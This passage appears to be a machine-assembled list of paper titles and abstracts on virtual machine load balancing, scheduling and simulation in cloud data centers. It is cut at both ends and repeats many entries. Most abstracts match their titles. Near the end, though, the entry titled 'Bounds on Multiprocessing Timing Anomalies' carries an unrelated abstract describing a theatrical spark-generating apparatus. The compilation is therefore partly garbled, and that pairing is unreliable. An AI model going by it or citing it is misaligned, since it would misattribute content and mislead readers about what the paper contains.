simulation services to users. In order to enable multitask and multiuser simulation systems with Cloud computing, Cloud simulation platform (CSP) was proposed and developed. To use key techniques of Cloud computing such as virtualization to promote the running efficiency of large-scale military HLA systems, this paper proposes a new type of federate container, virtual machine (VM), and its dynamic migration algorithm considering both computation and communication cost. Experiments show that the migration scheme effectively improves the running efficiency of HLA system when the distributed system is not saturated. --- paper_title: Cloud Data Management paper_content: In practice, the design and architecture of a cloud varies among cloud providers. We present a generic evaluation framework for the performance, availability and reliability characteristics of various cloud platforms. We describe a generic benchmark architecture for cloud databases, specifically NoSQL database as a service. It measures the performance of replication delay and monetary cost. Service Level Agreements (SLA) represent the contract which captures the agreed upon guarantees between a service provider and its customers. The specifications of existing service level agreements (SLA) for cloud services are not designed to flexibly handle even relatively straightforward performance and technical requirements of consumer applications. We present a novel approach for SLA-based management of cloud-hosted databases from the consumer perspective and an end-to-end framework for consumer-centric SLA management of cloud-hosted databases. The framework facilitates adaptive and dynamic provisioning of the database tier of the software applications based on application-defined policies for satisfying their own SLA performance requirements, avoiding the cost of any SLA violation and controlling the monetary cost of the allocated computing resources. In this framework, the SLA of the consumer applications are declaratively defined in terms of goals which are subjected to a number of constraints that are specific to the application requirements. The framework continuously monitors the application-defined SLA and automatically triggers the execution of necessary corrective actions (scaling out/in the database tier) when required. The framework is database platform-agnostic, uses virtualization-based database replication mechanisms and requires zero source code changes of the cloud-hosted software applications. --- paper_title: Cloud computing: state-of-the-art and research challenges paper_content: Cloud computing has recently emerged as a new paradigm for hosting and delivering services over the Internet. Cloud computing is attractive to business owners as it eliminates the requirement for users to plan ahead for provisioning, and allows enterprises to start from the small and increase resources only when there is a rise in service demand. However, despite the fact that cloud computing offers huge opportunities to the IT industry, the development of cloud computing technology is currently at its infancy, with many issues still to be addressed. In this paper, we present a survey of cloud computing, highlighting its key concepts, architectural principles, state-of-the-art implementation as well as research challenges. The aim of this paper is to provide a better understanding of the design challenges of cloud computing and identify important research directions in this increasingly important area. --- paper_title: Above the Clouds: A Berkeley View of Cloud Computing paper_content: Cloud Computing, the long-held dream of computing as a utility, has the potential to transform a large part of the IT industry, making software even more attractive as a service and shaping the way IT hardware is designed and purchased. Developers with innovative ideas for new Internet services no longer require the large capital outlays in hardware to deploy their service or the human expense to operate it. They need not be concerned about overprovisioning for a service whose popularity does not meet their predictions, thus wasting costly resources, or underprovisioning for one that becomes wildly popular, thus missing potential customers and revenue. Moreover, companies with large batch-oriented tasks can get results as quickly as their programs can scale, since using 1000 servers for one hour costs no more than using one server for 1000 hours. This elasticity of resources, without paying a premium for large scale, is unprecedented in the history of IT. Cloud Computing refers to both the applications delivered as services over the Internet and the hardware and systems software in the datacenters that provide those services. The services themselves have long been referred to as Software as a Service (SaaS). The datacenter hardware and software is what we will call a Cloud. When a Cloud is made available in a pay-as-you-go manner to the general public, we call it a Public Cloud; the service being sold is Utility Computing. We use the term Private Cloud to refer to internal datacenters of a business or other organization, not made available to the general public. Thus, Cloud Computing is the sum of SaaS and Utility Computing, but does not include Private Clouds. People can be users or providers of SaaS, or users or providers of Utility Computing. We focus on SaaS Providers (Cloud Users) and Cloud Providers, which have received less attention than SaaS Users. From a hardware point of view, three aspects are new in Cloud Computing. --- paper_title: A dynamic and integrated load-balancing scheduling algorithm for Cloud datacenters paper_content: One of the challenging scheduling problems in Cloud datacenters is to take the allocation and migration of reconfigurable virtual machines into consideration as well as the integrated features of hosting physical machines. We introduce a dynamic and integrated resource scheduling algorithm (DAIRS) for Cloud datacenters. Unlike traditional load-balance scheduling algorithms which consider only one factor such as the CPU load in physical servers, DAIRS treats CPU, memory and network bandwidth integrated for both physical machines and virtual machines. We develop integrated measurement for the total imbalance level of a Cloud datacenter as well as the average imbalance level of each server. Simulation results show that DAIRS has good performance with regard to total imbalance level, average imbalance level of each server, as well as overall running time. --- paper_title: Virtual machine mapping policy based on load balancing in private cloud environment paper_content: The virtual machine allocation problem is the key to build a private cloud environment. This paper presents a virtual machine mapping policy based on multi-resource load balancing. It uses the resource consumption of the running virtual machine and the self-adaptive weighted approach, which resolves the load balancing conflicts of each independent resource caused by different demand for resources of cloud applications. Meanwhile, it uses probability approach to ease the problem of load crowding in the concurrent users scene. The experiments and comparative analysis show that this policy achieves the better effect than existing approach. --- paper_title: A hybrid meta-heuristic algorithm for VM scheduling with load balancing in cloud computing paper_content: Virtual machine (VM) scheduling with load balancing in cloud computing aims to assign VMs to suitable servers and balance the resource usage among all of the servers. In an infrastructure-as-a-service framework, there will be dynamic input requests, where the system is in charge of creating VMs without considering what types of tasks run on them. Therefore, scheduling that focuses only on fixed task sets or that requires detailed task information is not suitable for this system. This paper combines ant colony optimization and particle swarm optimization to solve the VM scheduling problem, with the result being known as ant colony optimization with particle swarm (ACOPS). ACOPS uses historical information to predict the workload of new input requests to adapt to dynamic environments without additional task information. ACOPS also rejects requests that cannot be satisfied before scheduling to reduce the computing time of the scheduling procedure. Experimental results indicate that the proposed algorithm can keep the load balance in a dynamic environment and outperform other approaches. --- paper_title: Metaheuristics: From Design to Implementation paper_content: A unified view of metaheuristics This book provides a complete background on metaheuristics and shows readers how to design and implement efficient algorithms to solve complex optimization problems across a diverse range of applications, from networking and bioinformatics to engineering design, routing, and scheduling. It presents the main design questions for all families of metaheuristics and clearly illustrates how to implement the algorithms under a software framework to reuse both the design and code. Throughout the book, the key search components of metaheuristics are considered as a toolbox for: Designing efficient metaheuristics (e.g. local search, tabu search, simulated annealing, evolutionary algorithms, particle swarm optimization, scatter search, ant colonies, bee colonies, artificial immune systems) for optimization problems Designing efficient metaheuristics for multi-objective optimization problems Designing hybrid, parallel, and distributed metaheuristics Implementing metaheuristics on sequential and parallel machines Using many case studies and treating design and implementation independently, this book gives readers the skills necessary to solve large-scale optimization problems quickly and efficiently. It is a valuable reference for practicing engineers and researchers from diverse areas dealing with optimization or machine learning; and graduate students in computer science, operations research, control, engineering, business and management, and applied mathematics. --- paper_title: Virtual machine mapping policy based on load balancing in private cloud environment paper_content: The virtual machine allocation problem is the key to build a private cloud environment. This paper presents a virtual machine mapping policy based on multi-resource load balancing. It uses the resource consumption of the running virtual machine and the self-adaptive weighted approach, which resolves the load balancing conflicts of each independent resource caused by different demand for resources of cloud applications. Meanwhile, it uses probability approach to ease the problem of load crowding in the concurrent users scene. The experiments and comparative analysis show that this policy achieves the better effect than existing approach. --- paper_title: A Load Balancing Scheme Using Federate Migration Based on Virtual Machines for Cloud Simulations paper_content: A maturing and promising technology, Cloud computing can benefit large-scale simulations by providing on-demand, anywhere simulation services to users. In order to enable multitask and multiuser simulation systems with Cloud computing, Cloud simulation platform (CSP) was proposed and developed. To use key techniques of Cloud computing such as virtualization to promote the running efficiency of large-scale military HLA systems, this paper proposes a new type of federate container, virtual machine (VM), and its dynamic migration algorithm considering both computation and communication cost. Experiments show that the migration scheme effectively improves the running efficiency of HLA system when the distributed system is not saturated. --- paper_title: A distributed and collaborative dynamic load balancer for virtual machine paper_content: With the number of services using virtualization and clouds growing faster and faster, it is common to mutualize thousands of virtual machines within one distributed system. Consequently, the virtualized services, softwares, hardwares and infrastructures share the same physical resources, thus the performance of one depends of the resources usage of others. We propose a solution for vm load balancing (and rebalancing) based on the observation of the resources quota and the dynamic usage that leads to better balancing of resources. As it is not possible to have a single scheduler for the whole cloud and to avoid a single point of failure, our scheduler uses distributed and collaborative scheduling agents. We present scenarios simulating various cloud resources and vm usage experimented on our testbed p2p architecture. --- paper_title: Cloud brokering mechanisms for optimized placement of virtual machines across multiple providers paper_content: In the past few years, we have witnessed the proliferation of a heterogeneous ecosystem of cloud providers, each one with a different infrastructure offer and pricing policy. We explore this heterogeneity in a novel cloud brokering approach that optimizes placement of virtual infrastructures across multiple clouds and also abstracts the deployment and management of infrastructure components in these clouds. The feasibility of our approach is evaluated in a high throughput computing cluster case study. Experimental results confirm that multi-cloud deployment provides better performance and lower costs compared to the usage of a single cloud only. --- paper_title: A Scheduling Strategy on Load Balancing of Virtual Machine Resources in Cloud Computing Environment paper_content: The current virtual machine(VM) resources scheduling in cloud computing environment mainly considers the current state of the system but seldom considers system variation and historical data, which always leads to load imbalance of the system. In view of the load balancing problem in VM resources scheduling, this paper presents a scheduling strategy on load balancing of VM resources based on genetic algorithm. According to historical data and current state of the system and through genetic algorithm, this strategy computes ahead the influence it will have on the system after the deployment of the needed VM resources and then chooses the least-affective solution, through which it achieves the best load balancing and reduces or avoids dynamic migration. This strategy solves the problem of load imbalance and high migration cost by traditional algorithms after scheduling. Experimental results prove that this method is able to realize load balancing and reasonable resources utilization both when system load is stable and variant. --- paper_title: An online load balancing scheduling algorithm for cloud data centers considering real-time multi-dimensional resource paper_content: In general, load-balance scheduling is NP-hard problem as proved in many open literatures. We introduce an online load balancing resource scheduling algorithm (OLRSA) for Cloud datacenters considering real-time and multi-dimensional resources. Unlike traditional load balance scheduling algorithms which often consider only one factor such as the CPU load in physical servers, OLRSA treats CPU, memory and network bandwidth integrated for both physical machines and virtual machines. We develop and apply integrated measurement for each server and a Cloud datacenter. Simulation results show that OLRSA has better performance than a few related load-balancing algorithms with regard to total imbalance level, makespan, as well as overall load efficiency. --- paper_title: Performance vector-based algorithm for virtual machine deployment in infrastructure clouds paper_content: Regarding the virtual machine deployment issues in cloud computing,the Performance Matching-Load Balancing(PM-LB) algorithm of virtual machine deployment was proposed.With performance vector,the performance standardization of virtual infrastructure was described.The matching vector was obtained by calculating the relative vector distance of virtual machine and the servers,then a comprehensive analysis of matching vector and load balancing vector was done to get the deployment result.The results of simulation in CloudSim environment prove that using the proposed algorithm can obtain better load-balancing performance and higher resource utilization. --- paper_title: Cloud brokering mechanisms for optimized placement of virtual machines across multiple providers paper_content: In the past few years, we have witnessed the proliferation of a heterogeneous ecosystem of cloud providers, each one with a different infrastructure offer and pricing policy. We explore this heterogeneity in a novel cloud brokering approach that optimizes placement of virtual infrastructures across multiple clouds and also abstracts the deployment and management of infrastructure components in these clouds. The feasibility of our approach is evaluated in a high throughput computing cluster case study. Experimental results confirm that multi-cloud deployment provides better performance and lower costs compared to the usage of a single cloud only. --- paper_title: A hybrid meta-heuristic algorithm for VM scheduling with load balancing in cloud computing paper_content: Virtual machine (VM) scheduling with load balancing in cloud computing aims to assign VMs to suitable servers and balance the resource usage among all of the servers. In an infrastructure-as-a-service framework, there will be dynamic input requests, where the system is in charge of creating VMs without considering what types of tasks run on them. Therefore, scheduling that focuses only on fixed task sets or that requires detailed task information is not suitable for this system. This paper combines ant colony optimization and particle swarm optimization to solve the VM scheduling problem, with the result being known as ant colony optimization with particle swarm (ACOPS). ACOPS uses historical information to predict the workload of new input requests to adapt to dynamic environments without additional task information. ACOPS also rejects requests that cannot be satisfied before scheduling to reduce the computing time of the scheduling procedure. Experimental results indicate that the proposed algorithm can keep the load balance in a dynamic environment and outperform other approaches. --- paper_title: Energy Efficient Multi Dimensional Host Load Aware Algorithm for Virtual Machine Placement and Optimization in Cloud Environment paper_content: The effectiveness and elasticity of virtual machine placement has become a main concern in modern cloud computing environment. Mapping the virtual machines to the physical machines cluster is called the VM placement. In this paper we present an efficient hybrid genetic based host load aware algorithm for scheduling and optimization of virtual machines in a cluster of Physical hosts. We used two different techniques, first initial VM packing is done by checking the load of the physical host and the user constraints of the VMs. Second optimization of placed VMs is done by using a hybrid genetic algorithm based on fitness function. The presented algorithm is implemented in JAVA Net beans IDE, and Clouds simulator has been used for simulation to assess the execution and performance of our heuristics by comparison with algorithms first fit, best fit and round robin. The performance of the proposed algorithm was examined from both users and service provider’s perception. The simulation results show that our proposed algorithm uses the less number of physical servers for placing a certain number of VMs which helps to improve the resource utilization rate. The response time of our algorithm is little bit more than the first fit algorithm because of its nature of allocating VMs is based on the user constraints and past usage history of the VMs. Elevated SLA satisfaction rate and inferior load imbalance rate was observed in results. Since we used a modified version of hybrid genetic algorithm for load optimization the percentage of VM migrations had been decreased through which we can achieve the better results for load balancing along with cost reduction. The results also show that our hybrid genetic based multi dimensional host load aware and user constraints based algorithm is applicable, valuable and reliable for implementation in real data center environments. --- paper_title: A dynamic and integrated load-balancing scheduling algorithm for Cloud datacenters paper_content: One of the challenging scheduling problems in Cloud datacenters is to take the allocation and migration of reconfigurable virtual machines into consideration as well as the integrated features of hosting physical machines. We introduce a dynamic and integrated resource scheduling algorithm (DAIRS) for Cloud datacenters. Unlike traditional load-balance scheduling algorithms which consider only one factor such as the CPU load in physical servers, DAIRS treats CPU, memory and network bandwidth integrated for both physical machines and virtual machines. We develop integrated measurement for the total imbalance level of a Cloud datacenter as well as the average imbalance level of each server. Simulation results show that DAIRS has good performance with regard to total imbalance level, average imbalance level of each server, as well as overall running time. --- paper_title: Prepartition: A new paradigm for the load balance of virtual machine reservations in data centers paper_content: It is significant to apply load-balancing strategy to improve the performance and reliability of resource in data centers. One of the challenging scheduling problems in Cloud data centers is to take the allocation and migration of reconfigurable virtual machines (VMs) as well as the integrated features of hosting physical machines (PMs) into consideration. In the reservation model, workload of data centers has fixed process interval characteristics. In general, load-balance scheduling is NP-hard problem as proved in many open literatures. Traditionally, for offline load balance without migration, one of the best approaches is LPT (Longest Process Time first), which is well known to have approximation ratio 4/3. With virtualization, reactive (post) migration of VMs after allocation is one popular way for load balance and traffic consolidation. However, reactive migration has difficulty to reach predefined load balance objectives, and may cause interruption and instability of service and other associated costs. In view of this, we propose a new paradigm-Prepartition: it proactively sets process-time bound for each request on each PM and prepares in advance to migrate VMs to achieve the predefined balance goal. Prepartition can reduce process time by preparing VM migration in advance and therefore reduce instability and achieve better load balance as desired. Trace-driven and synthetic simulation results show that Prepartition has 10%-20% better performance than the well known load balancing algorithms with regard to average CPU utilization, makespan as well as capacity makespan. --- paper_title: Performance evaluation of web servers using central load balancing policy over virtual machines on cloud paper_content: Cloud Computing adds more power to the existing Internet technologies. Virtualization harnesses the power of the existing infrastructure and resources. With virtualization we can simultaneously run multiple instances of different commodity operating systems. Since we have limited processors and jobs work in concurrent fashion, overload situations can occur. Things become even more challenging in distributed environment. We propose Central Load Balancing Policy for Virtual Machines (CLBVM) to balance the load evenly in a distributed virtual machine/cloud computing environment. This work tries to compare the performance of web servers based on our CLBVM policy and independent virtual machine(VM) running on a single physical server using Xen Virtualizaion. The paper discusses the efficacy and feasibility of using this kind of policy for overall performance improvement. --- paper_title: A Quadratic Equilibrium Entropy Based Virtual Machine Load Balance Evaluation Algorithm paper_content: Aiming at virtual machine load balance evaluation, this paper proposes an evaluation algorithm based on quadratic equilibrium entropy. Firstly, we propose the computational methods for linear equilibrium and quadratic equilibrium entropy. Secondly, we analyze the physical meanings of linear equilibrium and quadratic equilibrium, and analyze their application method in virtual machine load balance. Finally, we prove our scheme by giving experimental results. --- paper_title: A distributed and collaborative dynamic load balancer for virtual machine paper_content: With the number of services using virtualization and clouds growing faster and faster, it is common to mutualize thousands of virtual machines within one distributed system. Consequently, the virtualized services, softwares, hardwares and infrastructures share the same physical resources, thus the performance of one depends of the resources usage of others. We propose a solution for vm load balancing (and rebalancing) based on the observation of the resources quota and the dynamic usage that leads to better balancing of resources. As it is not possible to have a single scheduler for the whole cloud and to avoid a single point of failure, our scheduler uses distributed and collaborative scheduling agents. We present scenarios simulating various cloud resources and vm usage experimented on our testbed p2p architecture. --- paper_title: Server-storage virtualization: integration and load balancing in data centers paper_content: We describe the design of an agile data center with integrated server and storage virtualization technologies. Such data centers form a key building block for new cloud computing architectures. We also show how to leverage this integrated agility for non-disruptive load balancing in data centers across multiple resource layers - servers, switches, and storage. We propose a novel load balancing algorithm called VectorDot for handling the hierarchical and multi-dimensional resource constraints in such systems. The algorithm, inspired by the successful Toyoda method for multi-dimensional knapsacks, is the first of its kind. We evaluate our system on a range of synthetic and real data center testbeds comprising of VMware ESX servers, IBM SAN Volume Controller, Cisco and Brocade switches. Experiments under varied conditions demonstrate the end-to-end validity of our system and the ability of VectorDot to efficiently remove overloads on server, switch and storage nodes. --- paper_title: Cloud brokering mechanisms for optimized placement of virtual machines across multiple providers paper_content: In the past few years, we have witnessed the proliferation of a heterogeneous ecosystem of cloud providers, each one with a different infrastructure offer and pricing policy. We explore this heterogeneity in a novel cloud brokering approach that optimizes placement of virtual infrastructures across multiple clouds and also abstracts the deployment and management of infrastructure components in these clouds. The feasibility of our approach is evaluated in a high throughput computing cluster case study. Experimental results confirm that multi-cloud deployment provides better performance and lower costs compared to the usage of a single cloud only. --- paper_title: A dynamic and integrated load-balancing scheduling algorithm for Cloud datacenters paper_content: One of the challenging scheduling problems in Cloud datacenters is to take the allocation and migration of reconfigurable virtual machines into consideration as well as the integrated features of hosting physical machines. We introduce a dynamic and integrated resource scheduling algorithm (DAIRS) for Cloud datacenters. Unlike traditional load-balance scheduling algorithms which consider only one factor such as the CPU load in physical servers, DAIRS treats CPU, memory and network bandwidth integrated for both physical machines and virtual machines. We develop integrated measurement for the total imbalance level of a Cloud datacenter as well as the average imbalance level of each server. Simulation results show that DAIRS has good performance with regard to total imbalance level, average imbalance level of each server, as well as overall running time. --- paper_title: Open-Source Simulators for Cloud Computing: Comparative Study and Challenging Issues paper_content: Abstract Resource scheduling in infrastructure as a service (IaaS) is one of the keys for large-scale Cloud applications. Extensive research on all issues in real environment is extremely difficult because it requires developers to consider network infrastructure and the environment, which may be beyond the control. In addition, the network conditions cannot be controlled or predicted. Performance evaluations of workload models and Cloud provisioning algorithms in a repeatable manner under different configurations are difficult. Therefore, simulators are developed. To understand and apply better the state-of-the-art of Cloud computing simulators, and to improve them, we study four known open-source simulators. They are compared in terms of architecture, modeling elements, simulation process, performance metrics and scalability in performance. Finally, a few challenging issues as future research trends are outlined. --- paper_title: Prepartition: A new paradigm for the load balance of virtual machine reservations in data centers paper_content: It is significant to apply load-balancing strategy to improve the performance and reliability of resource in data centers. One of the challenging scheduling problems in Cloud data centers is to take the allocation and migration of reconfigurable virtual machines (VMs) as well as the integrated features of hosting physical machines (PMs) into consideration. In the reservation model, workload of data centers has fixed process interval characteristics. In general, load-balance scheduling is NP-hard problem as proved in many open literatures. Traditionally, for offline load balance without migration, one of the best approaches is LPT (Longest Process Time first), which is well known to have approximation ratio 4/3. With virtualization, reactive (post) migration of VMs after allocation is one popular way for load balance and traffic consolidation. However, reactive migration has difficulty to reach predefined load balance objectives, and may cause interruption and instability of service and other associated costs. In view of this, we propose a new paradigm-Prepartition: it proactively sets process-time bound for each request on each PM and prepares in advance to migrate VMs to achieve the predefined balance goal. Prepartition can reduce process time by preparing VM migration in advance and therefore reduce instability and achieve better load balance as desired. Trace-driven and synthetic simulation results show that Prepartition has 10%-20% better performance than the well known load balancing algorithms with regard to average CPU utilization, makespan as well as capacity makespan. --- paper_title: FlexCloud: A Flexible and Extendible Simulator for Performance Evaluation of Virtual Machine Allocation paper_content: Cloud Data centers aim to provide reliable, sustainable and scalable services for all kinds of applications. Resource scheduling is one of keys to cloud services. To model and evaluate different scheduling policies and algorithms, we propose FlexCloud, a flexible and scalable simulator that enables users to simulate the process of initializing cloud data centers, allocating virtual machine requests and providing performance evaluation for various scheduling algorithms. FlexCloud can be run on a single computer with JVM to simulate large scale cloud environments with focus on infrastructure as a service; adopts agile design patterns to assure the flexibility and extensibility; models virtual machine migrations which is lack in the existing tools; provides user-friendly interfaces for customized configurations and replaying. Comparing to existing simulators, FlexCloud has combining features for supporting public cloud providers, load-balance and energy-efficiency scheduling. FlexCloud has advantage in computing time and memory consumption to support large-scale simulations. The detailed design of FlexCloud is introduced and performance evaluation is provided. --- paper_title: A Toolkit for Modeling and Simulation of Real-Time Virtual Machine Allocation in a Cloud Data Center paper_content: Resource scheduling in infrastructure as a service (IaaS) is one of the keys for large-scale Cloud applications. Extensive research on all issues in real environment is extremely difficult because it requires developers to consider network infrastructure and the environment, which may be beyond the control. In addition, the network conditions cannot be predicted or controlled. Therefore, performance evaluation of workload models and Cloud provisioning algorithms in a repeatable manner under different configurations and requirements is difficult. There is still lack of tools that enable developers to compare different resource scheduling algorithms in IaaS regarding both computing servers and user workloads. To fill this gap in tools for evaluation and modeling of Cloud environments and applications, we propose CloudSched. CloudSched can help developers identify and explore appropriate solutions considering different resource scheduling algorithms. Unlike traditional scheduling algorithms considering only one factor such as CPU, which can cause hotspots or bottlenecks in many cases, CloudSched treats multidimensional resource such as CPU, memory and network bandwidth integrated for both physical machines and virtual machines (VMs) for different scheduling objectives (algorithms). In this paper, two existing simulation systems at application level for Cloud computing are studied, a novel lightweight simulation system is proposed for real-time VM scheduling in Cloud data centers, and results by applying the proposed simulation system are analyzed and discussed. --- paper_title: A hybrid meta-heuristic algorithm for VM scheduling with load balancing in cloud computing paper_content: Virtual machine (VM) scheduling with load balancing in cloud computing aims to assign VMs to suitable servers and balance the resource usage among all of the servers. In an infrastructure-as-a-service framework, there will be dynamic input requests, where the system is in charge of creating VMs without considering what types of tasks run on them. Therefore, scheduling that focuses only on fixed task sets or that requires detailed task information is not suitable for this system. This paper combines ant colony optimization and particle swarm optimization to solve the VM scheduling problem, with the result being known as ant colony optimization with particle swarm (ACOPS). ACOPS uses historical information to predict the workload of new input requests to adapt to dynamic environments without additional task information. ACOPS also rejects requests that cannot be satisfied before scheduling to reduce the computing time of the scheduling procedure. Experimental results indicate that the proposed algorithm can keep the load balance in a dynamic environment and outperform other approaches. --- paper_title: Energy Efficient Multi Dimensional Host Load Aware Algorithm for Virtual Machine Placement and Optimization in Cloud Environment paper_content: The effectiveness and elasticity of virtual machine placement has become a main concern in modern cloud computing environment. Mapping the virtual machines to the physical machines cluster is called the VM placement. In this paper we present an efficient hybrid genetic based host load aware algorithm for scheduling and optimization of virtual machines in a cluster of Physical hosts. We used two different techniques, first initial VM packing is done by checking the load of the physical host and the user constraints of the VMs. Second optimization of placed VMs is done by using a hybrid genetic algorithm based on fitness function. The presented algorithm is implemented in JAVA Net beans IDE, and Clouds simulator has been used for simulation to assess the execution and performance of our heuristics by comparison with algorithms first fit, best fit and round robin. The performance of the proposed algorithm was examined from both users and service provider’s perception. The simulation results show that our proposed algorithm uses the less number of physical servers for placing a certain number of VMs which helps to improve the resource utilization rate. The response time of our algorithm is little bit more than the first fit algorithm because of its nature of allocating VMs is based on the user constraints and past usage history of the VMs. Elevated SLA satisfaction rate and inferior load imbalance rate was observed in results. Since we used a modified version of hybrid genetic algorithm for load optimization the percentage of VM migrations had been decreased through which we can achieve the better results for load balancing along with cost reduction. The results also show that our hybrid genetic based multi dimensional host load aware and user constraints based algorithm is applicable, valuable and reliable for implementation in real data center environments. --- paper_title: A dynamic and integrated load-balancing scheduling algorithm for Cloud datacenters paper_content: One of the challenging scheduling problems in Cloud datacenters is to take the allocation and migration of reconfigurable virtual machines into consideration as well as the integrated features of hosting physical machines. We introduce a dynamic and integrated resource scheduling algorithm (DAIRS) for Cloud datacenters. Unlike traditional load-balance scheduling algorithms which consider only one factor such as the CPU load in physical servers, DAIRS treats CPU, memory and network bandwidth integrated for both physical machines and virtual machines. We develop integrated measurement for the total imbalance level of a Cloud datacenter as well as the average imbalance level of each server. Simulation results show that DAIRS has good performance with regard to total imbalance level, average imbalance level of each server, as well as overall running time. --- paper_title: Prepartition: A new paradigm for the load balance of virtual machine reservations in data centers paper_content: It is significant to apply load-balancing strategy to improve the performance and reliability of resource in data centers. One of the challenging scheduling problems in Cloud data centers is to take the allocation and migration of reconfigurable virtual machines (VMs) as well as the integrated features of hosting physical machines (PMs) into consideration. In the reservation model, workload of data centers has fixed process interval characteristics. In general, load-balance scheduling is NP-hard problem as proved in many open literatures. Traditionally, for offline load balance without migration, one of the best approaches is LPT (Longest Process Time first), which is well known to have approximation ratio 4/3. With virtualization, reactive (post) migration of VMs after allocation is one popular way for load balance and traffic consolidation. However, reactive migration has difficulty to reach predefined load balance objectives, and may cause interruption and instability of service and other associated costs. In view of this, we propose a new paradigm-Prepartition: it proactively sets process-time bound for each request on each PM and prepares in advance to migrate VMs to achieve the predefined balance goal. Prepartition can reduce process time by preparing VM migration in advance and therefore reduce instability and achieve better load balance as desired. Trace-driven and synthetic simulation results show that Prepartition has 10%-20% better performance than the well known load balancing algorithms with regard to average CPU utilization, makespan as well as capacity makespan. --- paper_title: A Scheduling Strategy on Load Balancing of Virtual Machine Resources in Cloud Computing Environment paper_content: The current virtual machine(VM) resources scheduling in cloud computing environment mainly considers the current state of the system but seldom considers system variation and historical data, which always leads to load imbalance of the system. In view of the load balancing problem in VM resources scheduling, this paper presents a scheduling strategy on load balancing of VM resources based on genetic algorithm. According to historical data and current state of the system and through genetic algorithm, this strategy computes ahead the influence it will have on the system after the deployment of the needed VM resources and then chooses the least-affective solution, through which it achieves the best load balancing and reduces or avoids dynamic migration. This strategy solves the problem of load imbalance and high migration cost by traditional algorithms after scheduling. Experimental results prove that this method is able to realize load balancing and reasonable resources utilization both when system load is stable and variant. --- paper_title: A Load Balancing Scheme Using Federate Migration Based on Virtual Machines for Cloud Simulations paper_content: A maturing and promising technology, Cloud computing can benefit large-scale simulations by providing on-demand, anywhere simulation services to users. In order to enable multitask and multiuser simulation systems with Cloud computing, Cloud simulation platform (CSP) was proposed and developed. To use key techniques of Cloud computing such as virtualization to promote the running efficiency of large-scale military HLA systems, this paper proposes a new type of federate container, virtual machine (VM), and its dynamic migration algorithm considering both computation and communication cost. Experiments show that the migration scheme effectively improves the running efficiency of HLA system when the distributed system is not saturated. --- paper_title: Virtual machine mapping policy based on load balancing in private cloud environment paper_content: The virtual machine allocation problem is the key to build a private cloud environment. This paper presents a virtual machine mapping policy based on multi-resource load balancing. It uses the resource consumption of the running virtual machine and the self-adaptive weighted approach, which resolves the load balancing conflicts of each independent resource caused by different demand for resources of cloud applications. Meanwhile, it uses probability approach to ease the problem of load crowding in the concurrent users scene. The experiments and comparative analysis show that this policy achieves the better effect than existing approach. --- paper_title: Cloud brokering mechanisms for optimized placement of virtual machines across multiple providers paper_content: In the past few years, we have witnessed the proliferation of a heterogeneous ecosystem of cloud providers, each one with a different infrastructure offer and pricing policy. We explore this heterogeneity in a novel cloud brokering approach that optimizes placement of virtual infrastructures across multiple clouds and also abstracts the deployment and management of infrastructure components in these clouds. The feasibility of our approach is evaluated in a high throughput computing cluster case study. Experimental results confirm that multi-cloud deployment provides better performance and lower costs compared to the usage of a single cloud only. --- paper_title: An Optimized Control Strategy for Load Balancing Based on Live Migration of Virtual Machine paper_content: The migration technology of virtual machine has received extensive attention in load balancing. In this paper, we purpose an optimized control strategy which combines multi-strategy mechanism with the prediction mechanism. According to the weighted average of the CPU, memory, I/O and network bandwidth utilization, we divide the hosts into four status domains. The hosts within different load status domain adopt different migration strategy, which considers migration timing, migration candidate VM and migration destination. Through this strategy, it reduces the number of the overloaded hosts, avoids instantaneous peak problem caused by the migration of virtual machines, solves the imbalance problem and the high-cost problem in tradition scheduling algorithm of migration. Experimental results demonstrate that this strategy is able to reduce the migration times and improve system performance. --- paper_title: AR model prediction of time series with trends and seasonalities: A contrast with Box-Jenkins modeling paper_content: A "long autoregressive (AR) model alternative to the classical Box-Jenkins ARIMA model method of modeling time series with trend and seasonality characteristics is considered. Superior forecast performance is demonstrated by our long AR model method on the Box-Jenkins Series G airline passenger data. The difference in performance is accounted for by the relative underparameterization of the Box-Jenkins method. A Householder transformation-Akaike AIC criterion method is employed for determining the best data transformed, detrended-deseasonalized stationary residuals-AR modeled time series. --- paper_title: Performance evaluation of web servers using central load balancing policy over virtual machines on cloud paper_content: Cloud Computing adds more power to the existing Internet technologies. Virtualization harnesses the power of the existing infrastructure and resources. With virtualization we can simultaneously run multiple instances of different commodity operating systems. Since we have limited processors and jobs work in concurrent fashion, overload situations can occur. Things become even more challenging in distributed environment. We propose Central Load Balancing Policy for Virtual Machines (CLBVM) to balance the load evenly in a distributed virtual machine/cloud computing environment. This work tries to compare the performance of web servers based on our CLBVM policy and independent virtual machine(VM) running on a single physical server using Xen Virtualizaion. The paper discusses the efficacy and feasibility of using this kind of policy for overall performance improvement. --- paper_title: A distributed and collaborative dynamic load balancer for virtual machine paper_content: With the number of services using virtualization and clouds growing faster and faster, it is common to mutualize thousands of virtual machines within one distributed system. Consequently, the virtualized services, softwares, hardwares and infrastructures share the same physical resources, thus the performance of one depends of the resources usage of others. We propose a solution for vm load balancing (and rebalancing) based on the observation of the resources quota and the dynamic usage that leads to better balancing of resources. As it is not possible to have a single scheduler for the whole cloud and to avoid a single point of failure, our scheduler uses distributed and collaborative scheduling agents. We present scenarios simulating various cloud resources and vm usage experimented on our testbed p2p architecture. --- paper_title: A dynamic and integrated load-balancing scheduling algorithm for Cloud datacenters paper_content: One of the challenging scheduling problems in Cloud datacenters is to take the allocation and migration of reconfigurable virtual machines into consideration as well as the integrated features of hosting physical machines. We introduce a dynamic and integrated resource scheduling algorithm (DAIRS) for Cloud datacenters. Unlike traditional load-balance scheduling algorithms which consider only one factor such as the CPU load in physical servers, DAIRS treats CPU, memory and network bandwidth integrated for both physical machines and virtual machines. We develop integrated measurement for the total imbalance level of a Cloud datacenter as well as the average imbalance level of each server. Simulation results show that DAIRS has good performance with regard to total imbalance level, average imbalance level of each server, as well as overall running time. --- paper_title: Bounds on Multiprocessing Timing Anomalies paper_content: An apparatus for generating sparks over a selected area to be used for theatrical effects. Metal wire having a diameter in the range of 0.020-0.125 inches is provided by two, independent supply sources. Each wire supply source is coupled to a wire guide which imposes synchronous, linear movement to each wire source at a selected rate. Each wire source is coupled to a tip assembly which places the terminus of each wire source adjacent one another. The positive and negative electrodes of a direct current power source are electrically connected to a respective terminus of each of the pair of wire sources, the output of the direct current power source is amplified to voltage sufficient to atomize the wire when the power source is short circuited. The atomization of the wire results in the production of heated, metallic particles simulating generated sparks. A source of compressed air is disposed adjacent the point of atomization. The atomized particles are disseminated across an area determined by the force imposed thereon by the compressed air. --- paper_title: Prepartition: A new paradigm for the load balance of virtual machine reservations in 